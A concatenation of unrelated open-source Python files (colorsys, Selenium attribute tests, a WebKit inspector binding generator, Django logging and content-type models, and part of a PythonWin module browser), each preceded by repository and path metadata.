"""Write a trace message to a file. Whenever a file is specified,
it becomes the default for the next call to Trace()."""
global TraceDefault
global TimeStampDefault
global PreviousTime
if file is None:
file = TraceDefault
else:
TraceDefault = file
if tstamp is None:
tstamp = TimeStampDefault
else:
TimeStampDefault = tstamp
try:
fp = TraceFP[file]
except KeyError:
try:
fp = TraceFP[file] = open(file, mode)
except TypeError:
# Assume we were passed an open file pointer.
fp = file
if tstamp:
now = time.time()
fp.write('%8.4f %8.4f: ' % (now - StartTime, now - PreviousTime))
PreviousTime = now
fp.write(msg)
fp.flush()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
sunlianqiang/kbengine | refs/heads/master | kbe/src/lib/python/Lib/colorsys.py | 144 | """Conversion functions between RGB and other color systems.
This modules provides two functions for each color system ABC:
rgb_to_abc(r, g, b) --> a, b, c
abc_to_rgb(a, b, c) --> r, g, b
All inputs and outputs are triples of floats in the range [0.0...1.0]
(with the exception of I and Q, which covers a slightly larger range).
Inputs outside the valid range may cause exceptions or invalid outputs.
Supported color systems:
RGB: Red, Green, Blue components
YIQ: Luminance, Chrominance (used by composite video signals)
HLS: Hue, Luminance, Saturation
HSV: Hue, Saturation, Value
"""
# References:
# http://en.wikipedia.org/wiki/YIQ
# http://en.wikipedia.org/wiki/HLS_color_space
# http://en.wikipedia.org/wiki/HSV_color_space
__all__ = ["rgb_to_yiq","yiq_to_rgb","rgb_to_hls","hls_to_rgb",
"rgb_to_hsv","hsv_to_rgb"]
# Some floating point constants
ONE_THIRD = 1.0/3.0
ONE_SIXTH = 1.0/6.0
TWO_THIRD = 2.0/3.0
# YIQ: used by composite video signals (linear combinations of RGB)
# Y: perceived grey level (0.0 == black, 1.0 == white)
# I, Q: color components
#
# There are a great many versions of the constants used in these formulae.
# The ones in this library uses constants from the FCC version of NTSC.
def rgb_to_yiq(r, g, b):
y = 0.30*r + 0.59*g + 0.11*b
i = 0.74*(r-y) - 0.27*(b-y)
q = 0.48*(r-y) + 0.41*(b-y)
return (y, i, q)
def yiq_to_rgb(y, i, q):
# r = y + (0.27*q + 0.41*i) / (0.74*0.41 + 0.27*0.48)
# b = y + (0.74*q - 0.48*i) / (0.74*0.41 + 0.27*0.48)
# g = y - (0.30*(r-y) + 0.11*(b-y)) / 0.59
r = y + 0.9468822170900693*i + 0.6235565819861433*q
g = y - 0.27478764629897834*i - 0.6356910791873801*q
b = y - 1.1085450346420322*i + 1.7090069284064666*q
if r < 0.0:
r = 0.0
if g < 0.0:
g = 0.0
if b < 0.0:
b = 0.0
if r > 1.0:
r = 1.0
if g > 1.0:
g = 1.0
if b > 1.0:
b = 1.0
return (r, g, b)
# HLS: Hue, Luminance, Saturation
# H: position in the spectrum
# L: color lightness
# S: color saturation
def rgb_to_hls(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
# XXX Can optimize (maxc+minc) and (maxc-minc)
l = (minc+maxc)/2.0
if minc == maxc:
return 0.0, l, 0.0
if l <= 0.5:
s = (maxc-minc) / (maxc+minc)
else:
s = (maxc-minc) / (2.0-maxc-minc)
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, l, s
def hls_to_rgb(h, l, s):
if s == 0.0:
return l, l, l
if l <= 0.5:
m2 = l * (1.0+s)
else:
m2 = l+s-(l*s)
m1 = 2.0*l - m2
return (_v(m1, m2, h+ONE_THIRD), _v(m1, m2, h), _v(m1, m2, h-ONE_THIRD))
def _v(m1, m2, hue):
hue = hue % 1.0
if hue < ONE_SIXTH:
return m1 + (m2-m1)*hue*6.0
if hue < 0.5:
return m2
if hue < TWO_THIRD:
return m1 + (m2-m1)*(TWO_THIRD-hue)*6.0
return m1
# HSV: Hue, Saturation, Value
# H: position in the spectrum
# S: color saturation ("purity")
# V: color brightness
def rgb_to_hsv(r, g, b):
maxc = max(r, g, b)
minc = min(r, g, b)
v = maxc
if minc == maxc:
return 0.0, 0.0, v
s = (maxc-minc) / maxc
rc = (maxc-r) / (maxc-minc)
gc = (maxc-g) / (maxc-minc)
bc = (maxc-b) / (maxc-minc)
if r == maxc:
h = bc-gc
elif g == maxc:
h = 2.0+rc-bc
else:
h = 4.0+gc-rc
h = (h/6.0) % 1.0
return h, s, v
def hsv_to_rgb(h, s, v):
if s == 0.0:
return v, v, v
i = int(h*6.0) # XXX assume int() truncates!
f = (h*6.0) - i
p = v*(1.0 - s)
q = v*(1.0 - s*f)
t = v*(1.0 - s*(1.0-f))
i = i%6
if i == 0:
return v, t, p
if i == 1:
return q, v, p
if i == 2:
return p, v, t
if i == 3:
return p, q, v
if i == 4:
return t, p, v
if i == 5:
return v, p, q
# Cannot get here
|
skurochkin/selenium | refs/heads/master | py/test/selenium/webdriver/common/element_attribute_tests.py | 65 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import pytest
class ElementAttributeTests(unittest.TestCase):
def testShouldReturnNullWhenGettingTheValueOfAnAttributeThatIsNotListed(self):
self._loadSimplePage()
head = self.driver.find_element_by_xpath("/html")
attribute = head.get_attribute("cheese")
self.assertTrue(attribute is None)
def testShouldReturnNullWhenGettingSrcAttributeOfInvalidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("invalidImgTag")
img_attr = img.get_attribute("src")
self.assertTrue(img_attr is None)
def testShouldReturnAnAbsoluteUrlWhenGettingSrcAttributeOfAValidImgTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validImgTag")
img_attr = img.get_attribute("src")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnAnAbsoluteUrlWhenGettingHrefAttributeOfAValidAnchorTag(self):
self._loadSimplePage()
img = self.driver.find_element_by_id("validAnchorTag")
img_attr = img.get_attribute("href")
self.assertTrue("icon.gif" in img_attr)
def testShouldReturnEmptyAttributeValuesWhenPresentAndTheValueIsActuallyEmpty(self):
self._loadSimplePage()
body = self.driver.find_element_by_xpath("//body")
self.assertEqual("", body.get_attribute("style"))
def testShouldReturnTheValueOfTheDisabledAttributeAsFalseIfNotSet(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertEqual(None, inputElement.get_attribute("disabled"))
self.assertTrue(inputElement.is_enabled())
pElement = self.driver.find_element_by_id("peas")
self.assertEqual(None, pElement.get_attribute("disabled"))
self.assertTrue(pElement.is_enabled())
def testShouldReturnTheValueOfTheIndexAttrbuteEvenIfItIsMissing(self):
self._loadPage("formPage")
multiSelect = self.driver.find_element_by_id("multi")
options = multiSelect.find_elements_by_tag_name("option")
self.assertEqual("1", options[1].get_attribute("index"))
def testShouldIndicateTheElementsThatAreDisabledAreNotis_enabled(self):
self._loadPage("formPage")
inputElement = self.driver.find_element_by_xpath("//input[@id='notWorking']")
self.assertFalse(inputElement.is_enabled())
inputElement = self.driver.find_element_by_xpath("//input[@id='working']")
self.assertTrue(inputElement.is_enabled())
def testElementsShouldBeDisabledIfTheyAreDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
self.assertFalse(disabledTextElement1.is_enabled())
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
self.assertFalse(disabledTextElement2.is_enabled())
disabledSubmitElement = self.driver.find_element_by_id("disabledSubmitElement")
self.assertFalse(disabledSubmitElement.is_enabled())
def testShouldIndicateWhenATextAreaIsDisabled(self):
self._loadPage("formPage")
textArea = self.driver.find_element_by_xpath("//textarea[@id='notWorkingArea']")
self.assertFalse(textArea.is_enabled())
def testShouldThrowExceptionIfSendingKeysToElementDisabledUsingRandomDisabledStrings(self):
self._loadPage("formPage")
disabledTextElement1 = self.driver.find_element_by_id("disabledTextElement1")
try:
disabledTextElement1.send_keys("foo")
self.fail("Should have thrown exception")
except:
pass
self.assertEqual("", disabledTextElement1.text)
disabledTextElement2 = self.driver.find_element_by_id("disabledTextElement2")
try:
disabledTextElement2.send_keys("bar")
self.fail("Should have thrown exception")
except:
pass
self.assertEqual("", disabledTextElement2.text)
def testShouldIndicateWhenASelectIsDisabled(self):
self._loadPage("formPage")
enabled = self.driver.find_element_by_name("selectomatic")
disabled = self.driver.find_element_by_name("no-select")
self.assertTrue(enabled.is_enabled())
self.assertFalse(disabled.is_enabled())
def testShouldReturnTheValueOfCheckedForACheckboxEvenIfItLacksThatAttribute(self):
self._loadPage("formPage")
checkbox = self.driver.find_element_by_xpath("//input[@id='checky']")
self.assertTrue(checkbox.get_attribute("checked") is None)
checkbox.click()
self.assertEqual("true", checkbox.get_attribute("checked"))
def testShouldReturnTheValueOfSelectedForRadioButtonsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
neverSelected = self.driver.find_element_by_id("cheese")
initiallyNotSelected = self.driver.find_element_by_id("peas")
initiallySelected = self.driver.find_element_by_id("cheese_and_peas")
self.assertTrue(neverSelected.get_attribute("selected") is None, "false")
self.assertTrue(initiallyNotSelected.get_attribute("selected") is None, "false")
self.assertEqual("true", initiallySelected.get_attribute("selected"), "true")
initiallyNotSelected.click()
self.assertTrue(neverSelected.get_attribute("selected") is None)
self.assertEqual("true", initiallyNotSelected.get_attribute("selected"))
self.assertTrue(initiallySelected.get_attribute("selected") is None)
def testShouldReturnTheValueOfSelectedForOptionsInSelectsEvenIfTheyLackThatAttribute(self):
self._loadPage("formPage")
selectBox = self.driver.find_element_by_xpath("//select[@name='selectomatic']")
options = selectBox.find_elements_by_tag_name("option")
one = options[0]
two = options[1]
self.assertTrue(one.is_selected())
self.assertFalse(two.is_selected())
self.assertEqual("true", one.get_attribute("selected"))
self.assertTrue(two.get_attribute("selected") is None)
def testShouldReturnValueOfClassAttributeOfAnElement(self):
self._loadPage("xhtmlTest")
heading = self.driver.find_element_by_xpath("//h1")
classname = heading.get_attribute("class")
self.assertEqual("header", classname)
# Disabled due to issues with Frames
#def testShouldReturnValueOfClassAttributeOfAnElementAfterSwitchingIFrame(self):
# self._loadPage("iframes")
# self.driver.switch_to.frame("iframe1")
#
# wallace = self.driver.find_element_by_xpath("//div[@id='wallace']")
# classname = wallace.get_attribute("class")
# self.assertEqual("gromit", classname)
def testShouldReturnTheContentsOfATextAreaAsItsValue(self):
self._loadPage("formPage")
value = self.driver.find_element_by_id("withText").get_attribute("value")
self.assertEqual("Example text", value)
def testShouldReturnTheContentsOfATextAreaAsItsValueWhenSetToNonNorminalTrue(self):
self._loadPage("formPage")
e = self.driver.find_element_by_id("withText")
self.driver.execute_script("arguments[0].value = 'tRuE'", e)
value = e.get_attribute("value")
self.assertEqual("tRuE", value)
def testShouldTreatReadonlyAsAValue(self):
self._loadPage("formPage")
element = self.driver.find_element_by_name("readonly")
readOnlyAttribute = element.get_attribute("readonly")
textInput = self.driver.find_element_by_name("x")
notReadOnly = textInput.get_attribute("readonly")
self.assertNotEqual(readOnlyAttribute, notReadOnly)
def testShouldGetNumericAtribute(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("withText")
self.assertEqual("5", element.get_attribute("rows"))
def testCanReturnATextApproximationOfTheStyleAttribute(self):
self._loadPage("javascriptPage")
style = self.driver.find_element_by_id("red-item").get_attribute("style")
self.assertTrue("background-color" in style.lower())
def testShouldCorrectlyReportValueOfColspan(self):
self._loadPage("tables")
th1 = self.driver.find_element_by_id("th1")
td2 = self.driver.find_element_by_id("td2")
self.assertEqual("th1", th1.get_attribute("id"))
self.assertEqual("3", th1.get_attribute("colspan"))
self.assertEqual("td2", td2.get_attribute("id"));
self.assertEquals("2", td2.get_attribute("colspan"));
def testCanRetrieveTheCurrentValueOfATextFormField_textInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("working")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_emailInput(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("email")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello@example.com")
self.assertEqual("hello@example.com", element.get_attribute("value"))
def testCanRetrieveTheCurrentValueOfATextFormField_textArea(self):
self._loadPage("formPage")
element = self.driver.find_element_by_id("emptyTextArea")
self.assertEqual("", element.get_attribute("value"))
element.send_keys("hello world")
self.assertEqual("hello world", element.get_attribute("value"))
@pytest.mark.ignore_chrome
def testShouldReturnNullForNonPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("working")
self.assertEqual(None, element1.get_attribute("required"))
element2 = self.driver.find_element_by_id("wallace")
self.assertEqual(None, element2.get_attribute("nowrap"))
@pytest.mark.ignore_ie
def testShouldReturnTrueForPresentBooleanAttributes(self):
self._loadPage("booleanAttributes")
element1 = self.driver.find_element_by_id("emailRequired")
self.assertEqual("true", element1.get_attribute("required"))
element2 = self.driver.find_element_by_id("emptyTextAreaRequired")
self.assertEqual("true", element2.get_attribute("required"))
element3 = self.driver.find_element_by_id("inputRequired")
self.assertEqual("true", element3.get_attribute("required"))
element4 = self.driver.find_element_by_id("textAreaRequired")
self.assertEqual("true", element4.get_attribute("required"))
element5 = self.driver.find_element_by_id("unwrappable")
self.assertEqual("true", element5.get_attribute("nowrap"))
def tesShouldGetUnicodeCharsFromAttribute(self):
self._loadPage("formPage")
title = self.driver.find_element_by_id("vsearchGadget").get_attribute("title")
self.assertEqual('Hvad s\xf8ger du?', title)
def _pageURL(self, name):
return self.webserver.where_is(name + '.html')
def _loadSimplePage(self):
self._loadPage("simpleTest")
def _loadPage(self, name):
self.driver.get(self._pageURL(name))
|
qtproject/qtwebkit | refs/heads/dev | Source/JavaScriptCore/inspector/scripts/generate-inspector-protocol-bindings.py | 2 | #!/usr/bin/env python
#
# Copyright (c) 2014 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# This script generates JS, Objective C, and C++ bindings for the inspector protocol.
# Generators for individual files are located in the codegen/ directory.
import os.path
import re
import sys
import string
from string import Template
import optparse
import logging
try:
import json
except ImportError:
import simplejson as json
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.ERROR)
log = logging.getLogger('global')
try:
from codegen import *
# When copying generator files to JavaScriptCore's private headers on Mac,
# the codegen/ module directory is flattened. So, import directly.
except ImportError, e:
# log.error(e) # Uncomment this to debug early import errors.
import models
from models import *
from generator import *
from cpp_generator import *
from objc_generator import *
from generate_cpp_alternate_backend_dispatcher_header import *
from generate_cpp_backend_dispatcher_header import *
from generate_cpp_backend_dispatcher_implementation import *
from generate_cpp_frontend_dispatcher_header import *
from generate_cpp_frontend_dispatcher_implementation import *
from generate_cpp_protocol_types_header import *
from generate_cpp_protocol_types_implementation import *
from generate_js_backend_commands import *
from generate_objc_backend_dispatcher_header import *
from generate_objc_backend_dispatcher_implementation import *
from generate_objc_configuration_header import *
from generate_objc_configuration_implementation import *
from generate_objc_conversion_helpers import *
from generate_objc_frontend_dispatcher_implementation import *
from generate_objc_header import *
from generate_objc_internal_header import *
from generate_objc_protocol_types_implementation import *
# A writer that only updates file if it actually changed.
class IncrementalFileWriter:
def __init__(self, filepath, force_output):
self._filepath = filepath
self._output = ""
self.force_output = force_output
def write(self, text):
self._output += text
def close(self):
text_changed = True
self._output = self._output.rstrip() + "\n"
try:
if self.force_output:
raise
read_file = open(self._filepath, "r")
old_text = read_file.read()
read_file.close()
text_changed = old_text != self._output
except:
# Ignore, just overwrite by default
pass
if text_changed or self.force_output:
out_file = open(self._filepath, "w")
out_file.write(self._output)
out_file.close()
def generate_from_specification(primary_specification_filepath=None,
supplemental_specification_filepaths=[],
concatenate_output=False,
output_dirpath=None,
force_output=False,
framework_name=""):
def load_specification(protocol, filepath, isSupplemental=False):
try:
with open(filepath, "r") as input_file:
parsed_json = json.load(input_file)
protocol.parse_specification(parsed_json, isSupplemental)
except ValueError as e:
raise Exception("Error parsing valid JSON in file: " + filepath)
protocol = models.Protocol(framework_name)
for specification in supplemental_specification_filepaths:
load_specification(protocol, specification, isSupplemental=True)
load_specification(protocol, primary_specification_filepath, isSupplemental=False)
protocol.resolve_types()
generators = []
is_test = protocol.framework is Frameworks.Test
if is_test or protocol.framework is not Frameworks.WebInspector:
generators.append(CppAlternateBackendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(JSBackendCommandsGenerator(protocol, primary_specification_filepath))
generators.append(CppBackendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(CppBackendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(CppFrontendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(CppFrontendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(CppProtocolTypesHeaderGenerator(protocol, primary_specification_filepath))
generators.append(CppProtocolTypesImplementationGenerator(protocol, primary_specification_filepath))
if is_test or protocol.framework is Frameworks.WebInspector:
generators.append(ObjCBackendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(ObjCBackendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCConfigurationHeaderGenerator(protocol, primary_specification_filepath))
generators.append(ObjCConfigurationImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCConversionHelpersGenerator(protocol, primary_specification_filepath))
generators.append(ObjCFrontendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCHeaderGenerator(protocol, primary_specification_filepath))
generators.append(ObjCProtocolTypesImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCInternalHeaderGenerator(protocol, primary_specification_filepath))
single_output_file_contents = []
for generator in generators:
output = generator.generate_output()
if concatenate_output:
single_output_file_contents.append('### Begin File: %s' % generator.output_filename())
single_output_file_contents.append(output)
single_output_file_contents.append('### End File: %s' % generator.output_filename())
single_output_file_contents.append('')
else:
output_file = IncrementalFileWriter(os.path.join(output_dirpath, generator.output_filename()), force_output)
output_file.write(output)
output_file.close()
if concatenate_output:
filename = os.path.join(os.path.basename(primary_specification_filepath) + '-result')
output_file = IncrementalFileWriter(os.path.join(output_dirpath, filename), force_output)
output_file.write('\n'.join(single_output_file_contents))
output_file.close()
if __name__ == '__main__':
allowed_framework_names = ['JavaScriptCore', 'WebInspector', 'Test']
cli_parser = optparse.OptionParser(usage="usage: %prog [options] PrimaryProtocol.json [SupplementalProtocol.json ...]")
cli_parser.add_option("-o", "--outputDir", help="Directory where generated files should be written.")
cli_parser.add_option("--framework", type="choice", choices=allowed_framework_names, help="The framework that the primary specification belongs to.")
cli_parser.add_option("--force", action="store_true", help="Force output of generated scripts, even if nothing changed.")
cli_parser.add_option("-v", "--debug", action="store_true", help="Log extra output for debugging the generator itself.")
cli_parser.add_option("-t", "--test", action="store_true", help="Enable test mode. Use unique output filenames created by prepending the input filename.")
options = None
arg_options, arg_values = cli_parser.parse_args()
if (len(arg_values) < 1):
raise ParseException("At least one plain argument expected")
if not arg_options.outputDir:
raise ParseException("Missing output directory")
if arg_options.debug:
log.setLevel(logging.DEBUG)
options = {
'primary_specification_filepath': arg_values[0],
'supplemental_specification_filepaths': arg_values[1:],
'output_dirpath': arg_options.outputDir,
'concatenate_output': arg_options.test,
'framework_name': arg_options.framework,
'force_output': arg_options.force
}
try:
generate_from_specification(**options)
except (ParseException, TypecheckException) as e:
if arg_options.test:
log.error(e.message)
else:
raise # Force the build to fail.
|
Yong-Lee/django | refs/heads/master | django/utils/log.py | 116 | from __future__ import unicode_literals
import logging
import logging.config # needed when logging_config doesn't start with logging.config
import sys
import warnings
from copy import copy
from django.conf import settings
from django.core import mail
from django.core.mail import get_connection
from django.utils.deprecation import RemovedInNextVersionWarning
from django.utils.module_loading import import_string
from django.views.debug import ExceptionReporter
# Default logging for Django. This sends an email to the site admins on every
# HTTP 500 error. Depending on DEBUG, all other log records are either sent to
# the console (DEBUG=True) or discarded by mean of the NullHandler (DEBUG=False).
DEFAULT_LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console', 'mail_admins'],
},
'py.warnings': {
'handlers': ['console'],
},
}
}
def configure_logging(logging_config, logging_settings):
if not sys.warnoptions:
# Route warnings through python logging
logging.captureWarnings(True)
# RemovedInNextVersionWarning is a subclass of DeprecationWarning which
# is hidden by default, hence we force the "default" behavior
warnings.simplefilter("default", RemovedInNextVersionWarning)
if logging_config:
# First find the logging configuration function ...
logging_config_func = import_string(logging_config)
logging.config.dictConfig(DEFAULT_LOGGING)
# ... then invoke it with the logging settings
if logging_settings:
logging_config_func(logging_settings)
class AdminEmailHandler(logging.Handler):
"""An exception log handler that emails log entries to site admins.
If the request is passed as the first argument to the log record,
request data will be provided in the email report.
"""
def __init__(self, include_html=False, email_backend=None):
logging.Handler.__init__(self)
self.include_html = include_html
self.email_backend = email_backend
def emit(self, record):
try:
request = record.request
subject = '%s (%s IP): %s' % (
record.levelname,
('internal' if request.META.get('REMOTE_ADDR') in settings.INTERNAL_IPS
else 'EXTERNAL'),
record.getMessage()
)
except Exception:
subject = '%s: %s' % (
record.levelname,
record.getMessage()
)
request = None
subject = self.format_subject(subject)
# Since we add a nicely formatted traceback on our own, create a copy
# of the log record without the exception data.
no_exc_record = copy(record)
no_exc_record.exc_info = None
no_exc_record.exc_text = None
if record.exc_info:
exc_info = record.exc_info
else:
exc_info = (None, record.getMessage(), None)
reporter = ExceptionReporter(request, is_email=True, *exc_info)
message = "%s\n\n%s" % (self.format(no_exc_record), reporter.get_traceback_text())
html_message = reporter.get_traceback_html() if self.include_html else None
self.send_mail(subject, message, fail_silently=True, html_message=html_message)
def send_mail(self, subject, message, *args, **kwargs):
mail.mail_admins(subject, message, *args, connection=self.connection(), **kwargs)
def connection(self):
return get_connection(backend=self.email_backend, fail_silently=True)
def format_subject(self, subject):
"""
Escape CR and LF characters, and limit length.
RFC 2822's hard limit is 998 characters per line. So, minus "Subject: "
the actual subject must be no longer than 989 characters.
"""
formatted_subject = subject.replace('\n', '\\n').replace('\r', '\\r')
return formatted_subject[:989]
class CallbackFilter(logging.Filter):
"""
A logging filter that checks the return value of a given callable (which
takes the record-to-be-logged as its only parameter) to decide whether to
log a record.
"""
def __init__(self, callback):
self.callback = callback
def filter(self, record):
if self.callback(record):
return 1
return 0
class RequireDebugFalse(logging.Filter):
def filter(self, record):
return not settings.DEBUG
class RequireDebugTrue(logging.Filter):
def filter(self, record):
return settings.DEBUG
|
tjsavage/djangononrel-starter | refs/heads/master | django/contrib/contenttypes/models.py | 307 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
class ContentTypeManager(models.Manager):
# Cache to avoid re-looking up ContentType objects all over the place.
# This cache is shared by all the get_for_* methods.
_cache = {}
def get_by_natural_key(self, app_label, model):
try:
ct = self.__class__._cache[self.db][(app_label, model)]
except KeyError:
ct = self.get(app_label=app_label, model=model)
return ct
def get_for_model(self, model):
"""
Returns the ContentType object for a given model, creating the
ContentType if necessary. Lookups are cached so that subsequent lookups
for the same model don't hit the database.
"""
opts = model._meta
while opts.proxy:
model = opts.proxy_for_model
opts = model._meta
key = (opts.app_label, opts.object_name.lower())
try:
ct = self.__class__._cache[self.db][key]
except KeyError:
# Load or create the ContentType entry. The smart_unicode() is
# needed around opts.verbose_name_raw because name_raw might be a
# django.utils.functional.__proxy__ object.
ct, created = self.get_or_create(
app_label = opts.app_label,
model = opts.object_name.lower(),
defaults = {'name': smart_unicode(opts.verbose_name_raw)},
)
self._add_to_cache(self.db, ct)
return ct
def get_for_id(self, id):
"""
Lookup a ContentType by ID. Uses the same shared cache as get_for_model
(though ContentTypes are obviously not created on-the-fly by get_by_id).
"""
try:
ct = self.__class__._cache[self.db][id]
except KeyError:
# This could raise a DoesNotExist; that's correct behavior and will
# make sure that only correct ctypes get stored in the cache dict.
ct = self.get(pk=id)
self._add_to_cache(self.db, ct)
return ct
def clear_cache(self):
"""
Clear out the content-type cache. This needs to happen during database
flushes to prevent caching of "stale" content type IDs (see
django.contrib.contenttypes.management.update_contenttypes for where
this gets called).
"""
self.__class__._cache.clear()
def _add_to_cache(self, using, ct):
"""Insert a ContentType into the cache."""
model = ct.model_class()
key = (model._meta.app_label, model._meta.object_name.lower())
self.__class__._cache.setdefault(using, {})[key] = ct
self.__class__._cache.setdefault(using, {})[ct.id] = ct
class ContentType(models.Model):
name = models.CharField(max_length=100)
app_label = models.CharField(max_length=100)
model = models.CharField(_('python model class name'), max_length=100)
objects = ContentTypeManager()
class Meta:
verbose_name = _('content type')
verbose_name_plural = _('content types')
db_table = 'django_content_type'
ordering = ('name',)
unique_together = (('app_label', 'model'),)
def __unicode__(self):
return self.name
def model_class(self):
"Returns the Python model class for this type of content."
from django.db import models
return models.get_model(self.app_label, self.model)
def get_object_for_this_type(self, **kwargs):
"""
Returns an object of this type for the keyword arguments given.
Basically, this is a proxy around this object_type's get_object() model
method. The ObjectNotExist exception, if thrown, will not be caught,
so code that calls this method should catch it.
"""
return self.model_class()._default_manager.using(self._state.db).get(**kwargs)
def natural_key(self):
return (self.app_label, self.model)
|
leighpauls/k2cro4 | refs/heads/master | third_party/python_26/Lib/site-packages/pythonwin/pywin/framework/editor/ModuleBrowser.py | 17 | # ModuleBrowser.py - A view that provides a module browser for an editor document.
import pywin.mfc.docview
import win32ui
import win32con
import commctrl
import win32api
from pywin.tools import hierlist, browser
import pywin.framework.scriptutils
import afxres
import pyclbr
class HierListCLBRModule(hierlist.HierListItem):
def __init__(self, modName, clbrdata):
self.modName = modName
self.clbrdata = clbrdata
def GetText(self):
return self.modName
def GetSubList(self):
ret = []
for item in self.clbrdata.values():
if item.__class__ != pyclbr.Class: # ie, it is a pyclbr Function instance (only introduced post 1.5.2)
ret.append(HierListCLBRFunction( item ) )
else:
ret.append(HierListCLBRClass( item) )
ret.sort()
return ret
def IsExpandable(self):
return 1
class HierListCLBRItem(hierlist.HierListItem):
def __init__(self, name, file, lineno, suffix = ""):
self.name = str(name)
self.file = file
self.lineno = lineno
self.suffix = suffix
def __cmp__(self, other):
return cmp(self.name, other.name)
def GetText(self):
return self.name + self.suffix
def TakeDefaultAction(self):
if self.file:
pywin.framework.scriptutils.JumpToDocument(self.file, self.lineno, bScrollToTop = 1)
else:
win32ui.SetStatusText("Can not locate the source code for this object.")
def PerformItemSelected(self):
if self.file is None:
msg = "%s - source can not be located." % (self.name, )
else:
msg = "%s defined at line %d of %s" % (self.name, self.lineno, self.file)
win32ui.SetStatusText(msg)
class HierListCLBRClass(HierListCLBRItem):
def __init__(self, clbrclass, suffix = ""):
try:
name = clbrclass.name
file = clbrclass.file
lineno = clbrclass.lineno
self.super = clbrclass.super
self.methods = clbrclass.methods
except AttributeError:
name = clbrclass
file = lineno = None
self.super = []; self.methods = {}
HierListCLBRItem.__init__(self, name, file, lineno, suffix)
def __cmp__(self,other):
ret = cmp(self.name,other.name)
if ret==0 and (self is not other) and self.file==other.file:
self.methods = other.methods
self.super = other.super
self.lineno = other.lineno
return ret
def GetSubList(self):
r1 = []
for c in self.super:
r1.append(HierListCLBRClass(c, " (Parent class)"))
r1.sort()
r2=[]
for meth, lineno in self.methods.items():
r2.append(HierListCLBRMethod(meth, self.file, lineno))
r2.sort()
return r1+r2
def IsExpandable(self):
return len(self.methods) + len(self.super)
def GetBitmapColumn(self):
return 21
class HierListCLBRFunction(HierListCLBRItem):
def __init__(self, clbrfunc, suffix = ""):
name = clbrfunc.name
